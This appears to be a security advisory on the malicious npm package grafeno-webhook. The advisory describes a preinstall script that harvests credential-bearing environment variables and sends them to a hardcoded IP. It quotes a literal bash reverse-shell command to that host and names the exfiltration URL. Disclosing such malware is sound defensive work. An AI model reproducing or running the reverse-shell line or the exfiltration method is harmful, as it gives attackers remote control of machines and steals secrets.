MAL-2026-15573
Malicious code in grafeno-webhook (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (79e333edbcad465f3e5bdfafa8dc4ba91589d66e12c201bb9e1ed4037cb16c36) The preinstall.js lifecycle script executed automatically by npm install performs three hostile actions against the installer's machine. It enumerates process.env, filters for keys matching AWS|TOKEN|KEY|SECRET|PASS|API, base64-encodes the values together with os.hostname() and os.userInfo().username, and sends the blob via curl over plain HTTP to the hardcoded bare-IP endpoint http://216.126.236.46/r.php. On non-Windows platforms it additionally spawns an interactive bash reverse shell to 216.126.236.46:4444 (bash -i >& /dev/tcp/216.126.236.46/4444), giving the remote operator full command execution on the host running npm install. Host identifiers (hostname, username) are exfiltrated to the same IP, supporting victim tracking.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for grafeno-webhook (npm). Pin to a known-safe version or switch to an alternative.